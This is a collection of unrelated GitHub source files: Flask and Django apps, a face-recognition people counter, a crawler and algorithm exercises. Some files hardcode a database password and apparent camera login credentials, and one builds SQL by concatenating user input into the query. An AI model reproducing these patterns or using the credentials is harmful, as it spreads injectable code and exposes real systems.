'twitter_preference' in args and args['twitter_preference']:\n sql += \"CASE WHEN authors LIKE '%\" + args['twitter_preference'] + \"%' THEN NULL ELSE link END DESC\"\n else:\n sql += \"link\"\n LOG.debug(sql)\n \n new_papers = [ ]\n for row in cur.execute(sql):\n paper = {\n \"link\": row[0],\n \"title\": row[1],\n \"authors\": row[2],\n \"volume\": row[3],\n \"number\": row[4],\n \"published\":row[5],\n }\n new_papers.append(paper)\n ## FOR\n paper_count = 0\n for paper in new_papers:\n postTwitter(args, db, paper)\n paper_count += 1\n if args[\"twitter_limit\"] and paper_count > args[\"twitter_limit\"]:\n break\n LOG.warn(\"Sleeping for %d seconds...\" % TWITTER_SLEEP_TIME)\n time.sleep(TWITTER_SLEEP_TIME)\n ## FOR\n ## IF\n\n # Always create the RSS files from scratch\n if args[\"rss\"]:\n assert args[\"rss_path\"]\n \n sql = \"SELECT * FROM papers ORDER BY volume ASC, number DESC, link\"\n papers = [ ]\n for row in cur.execute(sql):\n paper = {\n \"link\": row[0],\n \"title\": row[1],\n \"authors\": row[2],\n \"volume\": row[3],\n \"number\": row[4],\n \"published\":row[5],\n }\n papers.append(paper)\n ## FOR\n writeRSS(papers, args[\"rss_path\"])\n ## IF\n \n db.close()\n## MAIN\n \n 
\n","repo_name":"apavlo/pvldb-announce","sub_path":"pvldb-announce.py","file_name":"pvldb-announce.py","file_ext":"py","file_size_in_byte":13382,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"35"}
{"seq_id":"39822685364","text":"from random import choice\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n    return render_template(\"index.html\")\n\n\n@app.route(\"/wisdom\")\ndef wisdom():\n    quotes = [\n        \"Confucius say, man who run before bus get tired\",\n        \"Confucius say, cow with no legs, ground beef\",\n        \"Life is really simple, but we insist on making it complicated.\",\n    ]\n    return f'<p>{choice(quotes)}</p>'\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"djmunro/htmx-clone","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"30043050637","text":"# History page, displays a list of recipes that the logged-in user has looked at.\n# Also gives users the option to delete entries from their history page.\nfrom flask import Blueprint, render_template, request, redirect, url_for\nfrom flask_login import current_user\nfrom flask_cors import CORS\n\nfrom .models import Recipes, Profiles, History\nfrom . import db\nimport psycopg2\nimport json\n\n\nhistorys = Blueprint('history', __name__)\nCORS(historys)\n\n# Card class used to store the recipe information and image url\nclass Card:\n    def __init__(self, recipe, url):\n        self.recipe = recipe\n        self.url = url\n\n# Browsing history: lists the most recently browsed recipes.\n@historys.route('/history', methods = ['GET','POST'])\ndef history():\n    \n    if current_user.is_authenticated: \n        histories = History.query.filter_by(userid = current_user.id).order_by(History.last_view_date.desc(), History.last_view_time.desc()).all()\n        query = []\n        for i in histories:\n            if i.last_view_date and i.last_view_time:\n                recipes = Recipes.query.filter_by(id = i.recipe).all()\n                for recipe in recipes:\n                    # Link the creator's name as url\n                    creator_name = recipe.creator.split(\" \")\n                    profile = Profiles.query.filter_by(owns = recipe.creates, last_name = creator_name[1], first_name = creator_name[0]).first()\n                    card = Card(recipe, profile.custom_url)\n                    query.append(card)\n    else:\n        return render_template(\"restricted_access.html\")\n    \n    \n    \n    \n    conn = psycopg2.connect(\n        database=\"rec\", user='postgres', password='aa', host='localhost', port= '5432'\n)\n    conn.autocommit = True\n    cursor = conn.cursor()\n    # i1 is the current user's history joined with ingredients, to see which ingredients their history contains.\n    # i2 is the list of recipes whose ingredients aren't in the i1 list.\n    # i1 is joined with i2 to find recipes that use the same ingredients (or ingredients with similar names) as the ones in their history, but that don't contain any of the\n    # recipes already in their history; it counts how many ingredients a candidate recipe shares with the previously viewed recipes,\n    # meaning if recipe 1 and recipe 2 have 3 ingredients in common (or similarly named ones) it will count that.\n    # this list is called s1 and is then unioned with another list that is basically the same as s1 but with the LIKE pattern the opposite way around, to ensure\n    # that it catches cases missed by s1, e.g. 'chicken' is like 'chicken wing' but 'chicken wing' is not like 'chicken'.\n    # that joined list is called s2, which is joined with recipes to find the recipes' names and photos, ordered from the highest to\n    # the lowest count of shared ingredients, so the recipes sharing the most ingredients are displayed first.\n    \n    \n    # tl;dr: count the number of ingredients other recipes share with the user's history, then display the ones sharing the most.\n    sql = '''select s2.recipe_id, count(*), name, photo\n    from\n    (select * from\n    (select * from\n    (select distinct ingredient\n    from history h\n    join ingredient i on i.recipe_id = h.recipe\n    where userid=%s) i1\n    inner join\n    (select recipe_id, ingredient from Ingredient\n    except\n    \n    select recipe_id, ingredient\n    from history h\n    join ingredient i on i.recipe_id = h.recipe\n    where userid=%s) i2\n    \n    on lower(concat('%%', i1.ingredient, '%%')) like lower(concat( '%%', i2.ingredient, '%%'))) s1 \n    union\n    (select * from\n    (select distinct ingredient\n    from history h\n    join ingredient i on i.recipe_id = h.recipe\n    where userid=%s) i1\n    inner join\n    (select recipe_id, ingredient from Ingredient\n    except\n    \n    select recipe_id, ingredient\n    from history h\n    join ingredient i on i.recipe_id = h.recipe\n    where userid=%s) i2\n    \n    on lower(concat('%%', i2.ingredient, '%%')) like lower(concat( '%%', i1.ingredient, '%%')))) s2\n    \n    \n    join recipes r \n    on r.id = s2.recipe_id\n    group by s2.recipe_id, r.name, r.photo\n    order by count desc\n    limit 4;\n    '''\n    \n    id = str(current_user.id)\n    \n    cursor.execute(sql, (id, id, id, id))\n    res = cursor.fetchall()\n    \n    \n    return render_template(\"history.html\", query=query, type=\"recent\", res=res)\n\n# Delete the browsing record in the history page\n@historys.route('/delete history', methods=['GET', 'POST'])\ndef delete_history():\n    if request.method == 'POST':\n        browsing_history = json.loads(request.data)\n        recipeId = browsing_history['id']\n        delete_histories = History.query.filter_by(userid = current_user.id, recipe = recipeId).first()\n        db.session.delete(delete_histories)\n        db.session.commit()\n        histories = History.query.filter_by(userid = current_user.id).order_by(History.last_view_time.asc()).all()\n        query = []\n        for i in histories:\n            recipes = Recipes.query.filter_by(id = i.recipe).all()\n            for j in recipes:\n                query.append(j)\n    return redirect(url_for('recipes.history'))\n","repo_name":"benjamin-lai/myrecipes","sub_path":"website/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"72834444913","text":"from typing import List, Tuple\nfrom util import load\n\nStacks = List[List[str]]\nCommands = List[Tuple[int, int, int]]\n\n\ndef parse_stacks(lines: List[str]) -> Tuple[Stacks, List[str]]:\n    stacks = [[] for _ in range((len(lines[0]) // 4) + 1)]\n    for lineNumber, line in enumerate(lines):\n        for i, j in enumerate(range(1, len(lines[0]), 4)):\n            c = line[j]\n            if c.isdigit():\n                # Also return the remaining lines to parse the commands from\n                return (stacks, lines[lineNumber + 2 :])\n            if c != \" \":\n                stacks[i].append(c)\n\n\ndef parse_cmds(lines: List[str]) -> Commands:\n    for l in lines:\n        _, amount, _, origin, _, target = l.split()\n        yield int(amount), int(origin) - 1, int(target) - 1\n\n\ndef part1(stacks: Stacks, commands: Commands) -> str:\n    _stacks = [s.copy() for s in stacks]\n    for amount, origin, target in commands:\n        for _ in range(amount):\n            _stacks[target].insert(0, _stacks[origin].pop(0))\n    
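# moving crates one at a time reverses their order on the target stack; the top of every stack is index 0\n    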
return \"\".join([s[0] for s in _stacks])\n\n\ndef part2(stacks: Stacks, commands: Commands) -> str:\n _stacks = [s.copy() for s in stacks]\n for amount, origin, target in commands:\n segment = _stacks[origin][:amount]\n _stacks[origin] = _stacks[origin][amount:]\n _stacks[target] = segment + _stacks[target]\n return \"\".join([s[0] for s in _stacks])\n\n\ndef solve(data: str):\n lines = data.splitlines()\n stacks, lines = parse_stacks(lines)\n commands = parse_cmds(lines)\n\n print(\"Part 1:\", part1(stacks, commands))\n print(\"Part 2:\", part2(stacks, commands))\n\n\nif __name__ == \"__main__\":\n solve(load(5))\n","repo_name":"danielcmessias/AOC2022","sub_path":"05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13677817001","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models import user\n\nclass Message:\n def __init__(self, data):\n self.id = data['id']\n self.sender = user.User.get_user_by_id({\n 'id': data['sender_id']\n })\n self.receiver = user.User.get_user_by_id({\n 'id': data['receiver_id']\n })\n self.message = data['message']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n @classmethod\n def save(cls, data):\n query = \"INSERT INTO messages (sender_id, receiver_id, message) VALUES(%(sender)s, %(receiver)s, %(message)s);\"\n message_id = connectToMySQL('user_schema').query_db(query, data)\n return message_id\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM messages\"\n all_messages_in_db = connectToMySQL('user_schema').query_db(query)\n all_messages = []\n for one_message in all_messages_in_db:\n all_messages.append(cls(one_message))\n return all_messages\n\n @classmethod\n def delete(cls, data):\n query = \"DELETE FROM messages WHERE id = %(id)s\"\n connectToMySQL('user_schema').query_db(query, data)\n return ","repo_name":"beqasabana/login-registration","sub_path":"flask_app/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20184106483","text":"\"\"\"\r\nDefinition of TreeNode:\r\nclass TreeNode:\r\n def __init__(self, val):\r\n self.val = val\r\n self.left, self.right = None, None\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n \"\"\"\r\n @param root: the root of binary tree\r\n @return: the root of the maximum average of subtree\r\n \"\"\"\r\n\r\n def findSubtree2(self, root):\r\n # write your code here\r\n if root is None:\r\n return root\r\n\r\n self.maximum_average = -float(\"Inf\")\r\n self.result = None\r\n\r\n self.helper(root)\r\n\r\n return self.result\r\n\r\n def helper(self, node):\r\n if node is None:\r\n return 0, 0\r\n\r\n left_sum, left_size = self.helper(node.left)\r\n right_sum, right_size = self.helper(node.right)\r\n\r\n tree_sum, sum_size = node.val + left_sum + right_sum, left_size + right_size + 1\r\n\r\n if tree_sum / sum_size > self.maximum_average:\r\n self.maximum_average = tree_sum / sum_size\r\n self.result = node\r\n\r\n return tree_sum, sum_size\r\n\r\n\r\n","repo_name":"monpro/algorithm","sub_path":"src/binary-trees/subtree-with-maximum-average.py","file_name":"subtree-with-maximum-average.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"39"} +{"seq_id":"36984964320","text":"import 
tkinter as tk\nimport random\nimport pygame as pg\n\nclass Tetris:\n    'Tetris'\n    cell_size=30\n    def __init__(self,parent):\n        self.parent=parent\n        self.canvas=tk.Canvas(root)\n        self.canvas.grid(row=0,column=0)\n        self.tickrate=1000\n        self.parent.after(self.tickrate,self.tick)\n        print(self)\n        print(self.parent)\n    def tick(self):\n        print(\"tick tock\")\n        print(self)\n        print(self.parent)\n        print(self.parent.after)\n        #self.parent.after(self.tickrate,self.tick)\n        \nroot=tk.Tk() \ntetris=Tetris(root)\nroot.mainloop()\n","repo_name":"orangutan78/pythonLearning","sub_path":"orangutan/pygame/Tetris-foreign.py","file_name":"Tetris-foreign.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"31801358376","text":"from rest_framework.authtoken.views import obtain_auth_token\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n    \n    path('register/', views.register, name='register'),\n    path('logout/', views.logout, name='logout'),\n    path('view_user/<int:id>/', views.view_user, name='view_user'),\n    path('update_user/<int:id>/', views.update_user, name='update_user'),\n    path('send_money/', views.send_money, name='send_money'),\n    path('request_money/', views.request_money, name='request_money'),\n    path('activity/', views.activity, name='activity'),\n]","repo_name":"Dayakatherin/upisystem","sub_path":"usermanagement/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"18142619759","text":"import os\nimport sys\nfrom datetime import datetime\nfrom time import sleep, time\nimport argparse\n\nimport cv2\nimport numpy as np\nimport onnxruntime as ort\nimport torchvision.transforms as transforms\nfrom hikvisionapi import Client\nfrom PIL import Image\nfrom scipy.spatial.distance import cosine\nfrom tqdm import tqdm\n\nfrom align.align_trans import get_reference_facial_points, warp_and_crop_face\nfrom insightface.app import FaceAnalysis\nfrom trackableobject import TrackableObject\n\nsys.path.append('utils/')\nfrom sort_tracker import SORT\n\nreference = get_reference_facial_points(default_square=True)\n\nknown_people_list = []\nmodel = ort.InferenceSession(\"models/ir_50_arcface_batch384.onnx\", providers=['CUDAExecutionProvider', 'CPUExecutionProvider'])\n\nglobal cam\nsource = 1\ndef load_known_faces():\n    global known_people_list, model\n    # if os.path.exists(\"facedb.npy\"):\n    #     known_people_list = list(np.load('facedb.npy', allow_pickle=True))\n    #     print(\"loaded from file\")\n    #     print(known_people_list)\n    #     sleep(3)\n    known_faces=\"test/\"\n    list_images = os.listdir(known_faces)\n    for img_name in tqdm(list_images):\n        person_name = img_name.split(\".\")[0]\n        image_path = os.path.join(known_faces, img_name)\n        image = cv2.imread(image_path)\n        face_encodings = app.get(image)\n        if len(face_encodings)==0:\n            print(\"Cannot extract face feature from: {}\".format(img_name))\n            continue\n        person = {}\n        person[\"name\"] = person_name\n        bbox = face_encodings[0].bbox\n        # print(face.kps)\n        landmarks = np.array(face_encodings[0].kps)\n        landmarks = np.transpose(landmarks).reshape(10, -1)\n        landmarks = np.transpose(landmarks)[0]\n        facial5points = [[landmarks[j], landmarks[j + 5]] for j in range(5)]\n        face_img = align_face_onnx(image, facial5points)\n        embeddings = get_embeddings_immediate_onnx(face_img, model)\n        person[\"embedding\"] = embeddings\n        known_people_list.append(person)\n    np.save('facedb.npy', 
known_people_list) \n\n\ndef key_func(person):\n return person[\"sim\"]\n\n\ndef resize_frame(frame):\n frame = cv2.resize(frame, (640*1024//480, 1024))\n\n frame = frame[:, frame.shape[1]//2 - 300: frame.shape[1] // 2 + 300]\n\n return frame\n\n\ndef find_face(embedding):\n best_matches = []\n \n for person in known_people_list:\n sim = 1 - cosine(person[\"embedding\"], embedding)\n if(sim>0.45):\n known = {}\n known[\"person\"]=person\n known[\"sim\"]=sim\n best_matches.append(known)\n if len(best_matches) == 0:\n return \n best_matches.sort(key=key_func)\n # print(best_matches[0][\"sim\"])\n return best_matches[0]\n\ndef get_frame_hik():\n \n vid = cam.Streaming.channels[101].picture(method ='get', type = 'opaque_data')\n bytes = b''\n # with open('screen.jpg', 'wb') as f:\n for chunk in vid.iter_content(chunk_size=1024):\n\n bytes += chunk\n a = bytes.find(b'\\xff\\xd8')\n b = bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = bytes[a:b+2]\n bytes = bytes[b+2:]\n frame = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)\n return frame\n\n\ndef get_frame_video():\n \n ret, frame = cam.read()\n # print(ret)\n return frame\ndef align_face_onnx(img, landmark5):\n \n warped_face = warp_and_crop_face(img, landmark5, reference, crop_size=(112, 112), )\n\n img_warped = Image.fromarray(warped_face)\n # cv2.imwrite(\"test.jpg\", warped_face)\n return img_warped\n\n\ndef get_embeddings_immediate_onnx(face_img, model, input_size=None):\n if input_size is None:\n input_size = [112, 112]\n\n if face_img is None:\n return\n\n transform = transforms.Compose(\n [\n transforms.Resize(\n [int(128 * input_size[0] / 112),\n int(128 * input_size[0] / 112)],\n ), # smaller side resized\n transforms.CenterCrop([input_size[0], input_size[1]]),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n ],\n )\n\n # apply transformations \n face_img = transform(face_img)\n face_img = face_img[None, ...]\n face_img = face_img.cpu().detach().numpy()\n\n outputs = None\n\n outputs = model.run(None, {'input.1': face_img})\n\n\n\n if outputs is None:\n return\n\n return outputs[0]\n\nimport io\nimport json\n\nfile_name = \"{}_exp.mp4\".format(datetime.now())\nmy_writer = cv2.VideoWriter(file_name, cv2.VideoWriter_fourcc(*'MJPG'), 25, (1280, 720))\ndef main():\n\n \n\n\n load_known_faces()\n\n # ct = CentroidTracker(maxDisappeared=30, maxDistance=200)\n trackers = []\n ct = SORT(max_lost=5, iou_threshold=0.3)\n trackableObjects = {}\n global model\n # np.save('test3.npy', known_people_listp00) \n # exit(0)\n # d = np.load('test3.npy')\n # print(known_people_list)\n if False:\n global cam\n cam = Client('http://192.168.0.250', 'admin', 'inomjon199303_R')\n # else:\n # rtsp://admin:inomjon199303_R@192.168.0.250:554/Streaming/channels/101\n cam = cv2.VideoCapture(\"videos/D15_20230213153059.mp4\")\n Y_line = 720\n totalDown = 0\n totalUp = 0\n count = 0\n while(1):\n # _, frame = cap.read()\n\n # cv2.namedWindow('img', cv2.WINDOW_FREERATIO)\n # cv2.setWindowProperty('img', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n # print(_)\n rects=[]\n if False:\n frame = get_frame_hik()\n # print(\"hi\")\n # else:\n frame = get_frame_video()\n count+=1\n if count<1700:\n continue\n # frame = cv2.resize(frame, )\n if frame is None:\n print(\"frame is None\")\n # continue\n break\n\n start = time()\n # print(frame.shape)\n faces = app.get(frame)\n kps_list = []\n # print(\"time cost: {}\".format(time()-start))\n for face in faces:\n bbox = face.bbox\n # 
print(face.kps)\n landmarks = np.array(face.kps)\n landmarks = np.transpose(landmarks).reshape(10, -1)\n landmarks = np.transpose(landmarks)[0]\n # print(landmarks.astype('int'))\n # exit(0)\n person = None\n x1,y1,x2,y2 = int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3])\n kps = landmarks.astype('int')\n rects.append([x1, y1, x2, y2])\n kps_list.append(kps)\n # print(face.kps)\n # exit(0)\n # cv2.rectangle(frame, (x1, y1), (x2, y2), (0,255,0), 1)\n # print(face)\n # person = find_face(face.embedding)\n\n # if person is None:\n # continue\n # frame = cv2.putText(frame, person[\"person\"][\"name\"], (int(x1), int(y1)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0), 2, cv2.LINE_AA)\n # # print(\"recognized as: {}, similarity: {}\".format(person[\"person\"][\"name\"], person[\"sim\"]))\n # # img_name = \"{}_{}.jpg\".format(person[\"person\"][\"name\"], person[\"sim\"])\n # # img_path = os.path.join(\"results\", img_name)\n # # cv2.imwrite(img_path, frame)\n # print(rects)\n \n # objects = ct.update(rects)\n # print(rects)\n # cv2.line(frame, (0, Y_line), (2560, Y_line), (0, 0, 0), 3)\n objects = ct.update(np.array(rects), np.array(kps_list), np.ones(len(rects)))\n # print(objects)\n # loop over the tracked objects\n tic = time()\n for obj in objects:\n # check to see if a trackable object exists for the current\n # object ID\n # print(obj)\n objectID = obj[1]\n cv2.rectangle(frame, (obj[2], obj[3]), (obj[4], obj[5]), (0,255,0), 2)\n bbox = obj[2:6]\n kps = obj[6]\n cy = (obj[3]+obj[5])/2\n # print(centroid[6:])\n # print(kps)\n # print(len(kps))\n facial5points = [[kps[j], kps[j + 5]] for j in range(5)]\n # print(facial5points)\n # cv2.circle(frame, (facial5points[0][0],facial5points[0][1]), 4, (0,0,255), -1)\n to = trackableObjects.get(objectID, None)\n\n # if there is no existing trackable object, create one\n if to is None:\n to = TrackableObject(objectID, obj)\n else:\n to.path_length+=1\n to.centroids.append(obj)\n if not to.counted:\n if to.startY > Y_line and cy < Y_line and to.path_length>2:\n totalUp += 1\n to.counted = True\n\n elif to.startY < Y_line and cy > Y_line and to.path_length>2:\n totalDown += 1\n to.counted = True\n\n if not to.recognized:\n person = None\n face_img = align_face_onnx(frame, facial5points)\n embeddings = get_embeddings_immediate_onnx(face_img, model)\n person = find_face(embeddings)\n if person is not None:\n print(person[\"person\"][\"name\"])\n to.name = person[\"person\"][\"name\"]\n to.recognized = True\n\n \n \n\n trackableObjects[objectID] = to\n if to.recognized:\n text = \"{}\".format(to.name)\n else:\n text = \"ID {}\".format(objectID)\n cv2.putText(frame, text, (obj[2], obj[3]),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 4)\n # cv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)\n # print(time()-start)\n # print(\"loop: \", time()-tic)\n info = [\n (\"Exit\", totalUp),\n (\"Enter\", totalDown),\n ]\n\n\n # # Display the output\n # for (i, (k, v)) in enumerate(info):\n # text = \"{}: {}\".format(k, v)\n # cv2.putText(frame, text, (10, 1440 - ((i * 40) + 40)), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255, 255, 0), 4)\n\n cv2.imshow(\"SORT tracker\", cv2.resize(frame, (1080,720)))\n my_writer.write(cv2.resize(frame, (1280, 720)))\n k = cv2.waitKey(2)\n if k==ord(\"q\"):\n cv2.destroyAllWindows()\n # cap.release()\n break\n \n\n\n\n\ndef test():\n img1 = cv2.imread(\"1.jpeg\")\n start = time()\n faces = app.get(img1)\n # print(\"time cost: {}\".format(time()-start))\n for face in faces:\n print(face.rec_score)\n bbox = face.bbox\n person 
= None\n x1,y1,x2,y2 = bbox[0], bbox[1], bbox[2], bbox[3]\n cv2.rectangle(img1, (int(x1), int(y1)), (int(x2), int(y2)), (0,255,0), 1)\n \n cv2.imshow(\"test\", cv2.resize(img1, (480,640)))\n\n cv2.waitKey(0)\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--source\", default=0, help=\"input video/camera/rtsp stream\")\n args = parser.parse_args()\n # ap.add_argument(\"-d_w\", \"--detection_weights\", default=\"weights/helmet_head_person_s.pt\", help=\"detection model weights\")\n # ap.add_argument(\"-d\", \"--device\", default=\"cpu\", help=\"device type, cuda:0 or cpu\")\n # ap.add_argument(\"-th\", \"--conf_thresh\", default=0.25, help=\"confidence threshold\")\n # ap.add_argument(\"-is_video\", \"--is_video\", default=False, help=\"Read from hikvision api\")\n app = FaceAnalysis(root='./models', name='my_combo', allowed_modules=['detection'])\n app.prepare(ctx_id=0)\n # test()\n main()\n # img = ins_get_image('test')\n # faces = app.get(img)\n # for face in faces:\n # print(face)\n","repo_name":"RamatovInomjon/facelibuz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4837088965","text":"\"\"\"\nQuick Select\n\nSearch for the kth-smallest item\n\nThe worst-case performance of a randomized selection algorithm is O(n^2 )\n\"\"\"\n\ndef partition(arr, lo, hi):\n if lo == hi:\n return lo\n\n pivot = arr[lo]\n pivot_idx = lo\n hi_idx = hi\n\n lt_pivot_idx = hi_idx\n gt_pivot_idx = lo + 1\n\n while True:\n while arr[gt_pivot_idx] < pivot and gt_pivot_idx < hi:\n gt_pivot_idx += 1\n while arr[lt_pivot_idx] > pivot and lt_pivot_idx >= lo:\n lt_pivot_idx -= 1\n\n if gt_pivot_idx < lt_pivot_idx:\n arr[gt_pivot_idx],arr[lt_pivot_idx] = arr[lt_pivot_idx],arr[gt_pivot_idx]\n else:\n break\n\n arr[pivot_idx] = arr[lt_pivot_idx]\n arr[lt_pivot_idx] = pivot\n return lt_pivot_idx\n\n\ndef quick_select(arr, left, right, k):\n \"\"\"\n Search for the kth-smallest item\n :return:\n \"\"\"\n split = partition(arr, left, right)\n if split == k:\n return arr[split]\n elif split < k:\n return quick_select(arr, split + 1, right, k)\n else:\n return quick_select(arr, left, split-1, k)\n\ndef test_quick_select():\n inp = [([2,3,1,6,4,5,7],0,6,6),\n ([200,300,100], 0, 2, 2),\n ]\n out = [7,300]\n\n for i in range(len(inp)):\n test_res = quick_select(inp[i][0],inp[i][1],inp[i][2],inp[i][3])\n print('test_res:', test_res)\n print(\"Test\", i + 1, \":\", \"OK\\n\" if test_res == out[i] else \"Failed\\n\")\n\n\nif __name__ == '__main__':\n test_quick_select()\n\n\n","repo_name":"vladvvtesla/MyLeetCode","sub_path":"FLG/Implementations/Selection/26.QuickSelect.py","file_name":"26.QuickSelect.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39726270605","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\n\n\nclass Oracle:\n def __init__(self):\n self.file = open(\"./csv/oracle.csv\", \"w\", encoding='utf-8', newline='')\n self.write = csv.writer(self.file)\n self.write.writerow([\"title\", \"content\", \"url\", \"cnt\", \"source\", \"keyword\", \"image\", \"createdAt\"])\n\n def main(self):\n print(\"Oracle Crawl Start\")\n idx = 1\n while 1:\n if idx == 1:\n page = 'http://www.oracloud.kr'\n else:\n page = 'http://www.oracloud.kr/page/' + str(idx) + '/'\n req = requests.get(page)\n html = 
req.text\n            if '404' in html:\n                break\n            soup = BeautifulSoup(html, 'html.parser')\n            links = list(soup.find_all('a', {\"rel\": \"bookmark\"}))\n            for each in links:\n                title = self.parse_title(str(each))\n                url = self.parse_url(str(each))\n                temp_html = requests.get(url).text\n                time = temp_html.split(\"datetime=\\\"\")[1][:10]\n                # print(time)\n                self.write.writerow([title, \"temp\", url, 0, \"oracloud\", \"temp\", \"temp\", time])\n\n            idx += 1\n        print(\"Oracle Crawl End\")\n\n    def parse_url(self, url):\n        url = url.split(\"=\\\"\")[1].split(\"\\\" rel\")[0]\n        return url\n\n    def parse_title(self, title):\n        title = title.split(\"bookmark\\\">\")[1].split(\"</a>\")[0]\n        return title\n\n\nif __name__ == \"__main__\":\n    s = Oracle()\n    s.main()\n","repo_name":"team-asdf/yaboja-crawler","sub_path":"tech-crawler-ghyeon/crawl_oracloud_kr.py","file_name":"crawl_oracloud_kr.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"17552216020","text":"from collections import deque\r\n\r\nfood = int(input())\r\nclients = deque([int(x) for x in input().split()])\r\n\r\nprint(max(clients))\r\n\r\nfor client in clients.copy():\r\n    if food >= client:\r\n        clients.popleft()\r\n        food -= client\r\n    else:\r\n        print(f\"Orders left: {' '.join([str(x) for x in clients])}\")\r\n        break\r\nelse:\r\n    print(\"Orders complete\")\r\n","repo_name":"bokakov/SoftUni","sub_path":"Advansed23/lists_as_stacks_and_queues_exercise/Fast Food.py","file_name":"Fast Food.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"11603794655","text":"class SetFileName:\n    global extension\n    global fileName\n\n    @staticmethod\n    def getExtension():\n        return extension\n\n    @staticmethod\n    def getFileName():\n        return fileName\n\n    @staticmethod\n    def fileNamer():\n        global fileName\n        global extension\n        fileName = input(\"Enter .txt/.enc File Name: \")\n\n        if \".txt\" == fileName[len(fileName) - 4:len(fileName)]: # Removes .txt extension if user adds it\n            fileName = fileName[0:len(fileName) - 4]\n            extension = '.txt'\n        elif \".enc\" == fileName[len(fileName) - 4:len(fileName)]: # Removes .enc extension if user adds it\n            fileName = fileName[0:len(fileName) - 4]\n            extension = '.enc'\n        else:\n            print(\"'.txt' - .txt File\")\n            print(\"'.enc' - .enc File\")\n            extension = input(\"Extension Type: \")\n            while extension not in ['.txt', '.enc']: # If input is invalid\n                print(\"Invalid input:\", extension)\n                print(\"'.txt' - .txt File\")\n                print(\"'.enc' - .enc File\")\n                extension = input(\"Extension Type: \")\n\n        try:\n            test = open(fileName + extension)\n            test.close()\n        except FileNotFoundError:\n            print(\"File not found. 
Make sure that the File is in the same folder as this program.\")\n            SetFileName.fileNamer()\n","repo_name":"KZMachine/txtProject","sub_path":"FileNamer.py","file_name":"FileNamer.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
{"seq_id":"21380656144","text":"from typing import List\n\n\nclass Solution:\n    def checkPossibility(self, nums: List[int]) -> bool:\n        modified = False\n        n = len(nums)\n\n        for i in range(1, n):\n            if nums[i] < nums[i - 1]:\n                if modified:\n                    return False\n\n                if (i - 2 >= 0 and nums[i - 2] > nums[i]) \\\n                        and (i + 1 < n and nums[i - 1] > nums[i + 1]):\n                    return False\n\n                modified = True\n\n        return True\n","repo_name":"LeetCode101/LeetCode-Python","sub_path":"leetcode/algorithms/p0665_non_decreasing_array.py","file_name":"p0665_non_decreasing_array.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
